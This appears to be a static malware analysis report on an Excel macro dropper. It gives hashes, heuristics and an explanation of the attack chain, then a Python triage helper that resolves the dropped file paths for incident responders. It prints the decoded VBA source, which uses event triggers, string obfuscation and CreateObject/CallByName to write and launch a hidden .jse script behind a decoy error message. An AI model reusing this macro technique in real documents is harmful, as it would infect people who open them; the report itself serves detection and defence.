Xls.Dropper.Agent-8802594-0 — Office (OOXML) malware analysis

Static analysis result for SHA-256 1f970e047d24efa4…

MALICIOUS

Office (OOXML)

Size: 285.9 KB
Created: 2006-09-16 00:00:00 UTC (the stock creation timestamp carried over from Office's default templates, not a real authoring time)
Authoring application: Microsoft Excel 16.0300
First seen: 2020-07-24
MD5: dfcf371aa7ebf180ad14ca05158a482f
SHA-1: 2aa870f9b0cdfb383f5b7a62a0bbeb98d806e4c7
SHA-256: 1f970e047d24efa40694086ecc9bf9f6f550de0f6b6ad634c67652fe674104ab
Risk score: 232

Malware Insights

Xls.Dropper.Agent-8802594-0 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the file as malicious with the signature Xls.Dropper.Agent-8802594-0. The decoded VBA in Sheet1 uses CreateObject and CallByName, with the COM ProgID and the method name both read from UserForm1 control captions at run time (the ProgID additionally has filler "Y" characters removed with Replace), so neither string appears in the macro source. Nothing is attached to Auto_Open or Workbook_Open; the chain starts from the Worksheet_Calculate and Worksheet_PivotTableUpdate event handlers, which call Nedcttg. Nedcttg creates a directory Ex8Sw three levels above the Excel startup path (by default %APPDATA%\Microsoft\Excel\XLSTART, so the directory lands directly under %APPDATA%), saves a copy of the workbook there as Table<n>.xlsm with alerts suppressed, opens the copy and calls back into it with Application.Run. When UserForm1.SAZ.Caption reads "Edar" it flips that caption to "DOlerc" and runs Tinrfc, which assembles the path <workbook folder>\RPb.hudi.jse from split string fragments and writes the contents of the UserForm1.Inside control to it; otherwise it runs Nbed_78, which passes that path, wrapped in double quotes, as the argument of a CallByName method call (call type 1, vbMethod) on the CreateObject instance and then shows a decoy "The file is corrupted and cannot be opened" message box. The .jse extension denotes a JScript Encoded script, and its body is carried inside the workbook (UserForm1.Inside) rather than fetched from a server, so the sample is a dropper, not a downloader; the script itself lives in the form's storage and is not part of the decoded VBA shown below. The error-highlighting loop, highlightSpecificValues and degreeSymbol (which only receives CallByName's return value) are filler that gives the module a benign appearance.

Heuristics 7

  • ClamAV: Xls.Dropper.Agent-8802594-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-8802594-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject is called in MIObj on a ProgID assembled at run time from UserForm1 captions (d_d0 and d_d1, staged through cells F115 and F116) with "Y" characters stripped, so the ProgID does not appear in the source.
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName is called in Nbed_78 on that object with call type 1 (vbMethod), the method name taken from UserForm1.Film.Caption and the quoted path of the dropped .jse file as the argument.
  • External hyperlinks (4) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 4 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.quora.com/profile/Alok-Jha-43
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.micr (truncated) in document text (OOXML body / shared strings)
    • http://schemas.microso (truncated) in document text (OOXML body / shared strings)
    • http://schemas (truncated) in document text (OOXML body / shared strings)
    • https://www.quora.com/profile/Alok-Jha-43 as a document hyperlink
    The three truncated http://schemas.* entries are OOXML namespace URIs found in the XML parts of every Office file and are not network destinations. The Quora profile hyperlink is the only real external URL, and nothing in the extracted macro references it.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3680 bytes
SHA-256: 9b57c7e4bdfc2acdfbf82a4d62a725b561debe9b089aac4e9619f767cf8cdf3a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Function MIObj() As Object
Dim rng As Range
Dim i As Integer
For Each rng In ActiveSheet.UsedRange
If WorksheetFunction.IsError(rng) Then
i = i + 1
rng.Style = "bad"
End If
Next rng
Range("F115").Value = UserForm1.d_d0.Caption
Range("F116").Value = UserForm1.d_d1.Caption
Set MIObj = CreateObject(Replace(Range("F115").Value & Range("F116").Value, "Y", ""))
End Function

Sub highlightSpecificValues()
Dim rng As Range
Dim i As Integer
Dim c As Variant
c = "A1"
For Each rng In ActiveSheet.UsedRange
If rng = c Then
rng.Style = "Note"
i = i + 1
End If
Next rng
MsgBox "There are total " & i & " " & c & " in this worksheet."
End Sub

Sub degreeSymbol(ddf As Variant)
Dim rng As Range
For Each rng In Selection
rng.Select
If ActiveCell <> "" Then
If IsNumeric(ActiveCell.Value) Then
ActiveCell.Value = ActiveCell.Value & "°" & ddf
End If
End If
Next
End Sub



Private Sub Nbed_78()

Range("F143").Value = """"
Range("F123").Value = ActiveWorkbook.Path & "\RPb.hudi" & "" & ".j" & "" & "s" & "e"
degreeSymbol CallByName(MIObj, UserForm1.Film.Caption, 1, Range("F143").Value & Range("F123").Value & Range("F143").Value, 1)
MsgBox "The file is corrupted and cannot be opened"
highlightSpecificValues
End Sub

Private Sub Tinrfc()

Range("F123").Value = ActiveWorkbook.Path & "\RPb" & "" & ".hudi.j" & "" & "s" & "e"
DertOpl = Range("F123").Value
Open DertOpl For Output As #1
Print #1, UserForm1.Inside.Value
Close #1
End Sub



Sub Nedcttg(des As Integer)
Dim TgIok As Workbook

    awse = ActiveWorkbook.Application.StartupPath & "\..\..\..\Ex8Sw"
  
    On Error Resume Next
    MkDir awse

    Konrf_8 = awse & "\Table" & des & ".xlsm"
    Application.DisplayAlerts = False

    ActiveWorkbook.SaveCopyAs Konrf_8
    Range("F133").Value = "!Sheet1.Tinrfc"
    Set TgIok = Workbooks.Open(Konrf_8)
    If UserForm1.SAZ.Caption = "Edar" Then
    UserForm1.SAZ.Caption = "DOlerc"

    TgIok.Application.Run "'" & TgIok.FullName & "'" & Range("F133").Value
    Else
    Range("F131").Value = "!Sheet1.Nbed_78"
    TgIok.Application.Run "'" & TgIok.FullName & "'" & Range("F131").Value
    End If
    Set TgIok = Nothing
    
   
End Sub




Private Sub Worksheet_PivotTableUpdate(ByVal Target As PivotTable)
Nedcttg 9
End Sub



Private Sub Worksheet_Calculate()
Nedcttg 55
End Sub





Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{2324325F-79BC-422C-9975-B1892917E250}{03763AE3-6E0F-4717-B249-114C16B7CA71}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 678912 bytes
SHA-256: fad30b1adce154b10cff417f72cebd927d675d181e52b66e9a2c3b151890a9ab
Detection
ClamAV: Xls.Dropper.Agent-8802594-0
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
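The heuristics above flag CreateObject and CallByName, but what a responder actually needs from this macro is the file it drops, the directory it stages its own copy in, and the event handlers that fire it. The following added example (it is not code from the original report, from oletools or from ClamAV) shows how to get those from the decoded source: it folds the `"\RPb.hudi" & "" & ".j" & "" & "s" & "e"` style concatenations the macro uses to keep strings out of sight, inlines the worksheet cells and local variables the macro uses as storage, flags the risky calls and event triggers, and renders concrete host paths to hunt for. The folding and cell-inlining are generic and work for any VBA `&` chain, not only this sample. VBA_SOURCE is a constructed excerpt of the macro shown above; the paths in ASSUMED_ENV and the `des` value of 55 (what Worksheet_Calculate passes to Nedcttg) are assumptions about the victim machine and are not taken from the sample.

```python
"""Triage helper for the decoded VBA above (added example; not code from the original
report, oletools or ClamAV). Folds the `"a" & "" & "b"` concatenations that hide the
macro's file names, inlines the cells and variables it uses as storage, flags risky calls
and event triggers, and renders concrete host artifacts to hunt for. VBA_SOURCE is a
constructed excerpt of the macro on this page; ASSUMED_ENV holds assumed victim values."""
import ntpath
import re
VBA_SOURCE = r'''
Set MIObj = CreateObject(Replace(Range("F115").Value & Range("F116").Value, "Y", ""))
Range("F143").Value = """"
Range("F123").Value = ActiveWorkbook.Path & "\RPb.hudi" & "" & ".j" & "" & "s" & "e"
degreeSymbol CallByName(MIObj, UserForm1.Film.Caption, 1, Range("F143").Value & Range("F123").Value & Range("F143").Value, 1)
DertOpl = Range("F123").Value
Open DertOpl For Output As #1
awse = ActiveWorkbook.Application.StartupPath & "\..\..\..\Ex8Sw"
Konrf_8 = awse & "\Table" & des & ".xlsm"
ActiveWorkbook.SaveCopyAs Konrf_8
TgIok.Application.Run "'" & TgIok.FullName & "'" & Range("F133").Value
Private Sub Worksheet_Calculate()
Nedcttg 55
End Sub
'''
ASSUMED_ENV = {  # assumed runtime values, not taken from the sample
    "ActiveWorkbook.Path": r"C:\Users\victim\Downloads",
    "ActiveWorkbook.Application.StartupPath": r"C:\Users\victim\AppData\Roaming\Microsoft\Excel\XLSTART",
    "des": "55",  # the argument Worksheet_Calculate passes to Nedcttg
}
ASSIGN = re.compile(r'^(Range\("[A-Z]+\d+"\)\.Value|[A-Za-z_]\w*)\s*=\s*(.+)$')
INDICATORS = {  # indicator name -> regex, matched against each source line
    "CreateObject": r"\bCreateObject\s*\(",
    "CallByName": r"\bCallByName\s*\(",
    "file write": r"\bOpen\b.+\bFor\s+Output\b",
    "self-copy (SaveCopyAs)": r"\bSaveCopyAs\b",
    "cross-workbook Application.Run": r"\bApplication\.Run\b",
    "event trigger": r"^\s*Private Sub Worksheet_(Calculate|PivotTableUpdate)\b",
}

def split_top(expr, sep):
    """Split on sep at parenthesis depth 0 and outside string literals ("" escapes a quote)."""
    parts, buf, in_str, depth, i = [], [], False, 0, 0
    while i < len(expr):
        ch = expr[i]
        if in_str and ch == '"' and expr[i + 1:i + 2] == '"':
            buf.append('""'); i += 2; continue          # escaped quote inside a literal
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in "()":
            depth += 1 if ch == "(" else -1
        elif not in_str and ch == sep and depth == 0:
            parts.append("".join(buf).strip()); buf = []; i += 1; continue
        buf.append(ch); i += 1
    parts.append("".join(buf).strip())
    return [p for p in parts if p]

def vba_literal(tok):  # Python value of a VBA string literal token, else None
    return tok[1:-1].replace('""', '"') if len(tok) >= 2 and tok[0] == tok[-1] == '"' else None

def fold_literals(expr):
    """Merge adjacent string literals in an & chain; non-literal terms stay symbolic."""
    out = []
    for tok in split_top(expr, "&"):
        lit = vba_literal(tok)
        if lit is not None and out and out[-1][0] == "lit":
            out[-1] = ("lit", out[-1][1] + lit)
        else:
            out.append(("lit", lit) if lit is not None else ("sym", tok))
    return " & ".join('"%s"' % v.replace('"', '""') if k == "lit" else v for k, v in out)

def expand(expr, assigns, depth=0):
    """Inline assigned cells/variables recursively (bounded), then fold the literals."""
    parts = [expand(assigns[t], assigns, depth + 1) if depth < 8 and t in assigns else t
             for t in split_top(expr, "&")]
    return fold_literals(" & ".join(parts))

def concretize(expr, assigns, env):
    """Render an expression as a string; runtime-only terms come from env or stay <symbolic>."""
    return "".join(vba_literal(t) if vba_literal(t) is not None else env.get(t, "<%s>" % t)
                   for t in split_top(expand(expr, assigns), "&"))

def find_indicators(source):  # -> [(indicator, line number, stripped line)]
    return [(name, n, line.strip()) for n, line in enumerate(source.splitlines(), 1)
            for name, pat in INDICATORS.items() if re.search(pat, line)]

def triage(source=VBA_SOURCE, env=ASSUMED_ENV):
    """Indicators plus the concrete artifacts the macro writes and hands to CallByName."""
    assigns = {}
    for m in filter(None, map(ASSIGN.match, map(str.strip, source.splitlines()))):
        assigns.setdefault(m.group(1), m.group(2))   # first write to a cell/variable wins
    hits = find_indicators(source)
    cbn = re.search(r"CallByName\((.*)\)\s*$", source, re.M)
    args = split_top(cbn.group(1), ",") if cbn else []   # (object, method, calltype, argument, ...)
    return {
        "indicators": sorted({name for name, _, _ in hits}),
        "triggers": [line for name, _, line in hits if name == "event trigger"],
        "dropped_file": concretize('Range("F123").Value', assigns, env),
        "staging_copy": ntpath.normpath(concretize("Konrf_8", assigns, env)),
        "method_name_source": args[1] if len(args) > 1 else None,  # a form caption, not in source
        "method_argument": concretize(args[3], assigns, env) if len(args) > 3 else None,
    }

if __name__ == "__main__":
    for key, value in triage().items():
        print("%-20s %s" % (key, value))
```

With the assumed environment, `triage()` resolves the dropped file to `C:\Users\victim\Downloads\RPb.hudi.jse`, the staged workbook copy to `C:\Users\victim\AppData\Roaming\Ex8Sw\Table55.xlsm` (the three `..` segments walk out of XLSTART into the Roaming profile), and the CallByName argument to that same .jse path wrapped in double quotes, which is the shape a command-line argument takes; the method name itself resolves only to `UserForm1.Film.Caption`, because it is stored in the form, not in the VBA. The output is the hunt list for an endpoint: an `Ex8Sw` directory under the user profile, `Table<n>.xlsm` files inside it, and `RPb.hudi.jse` next to wherever the lure was opened.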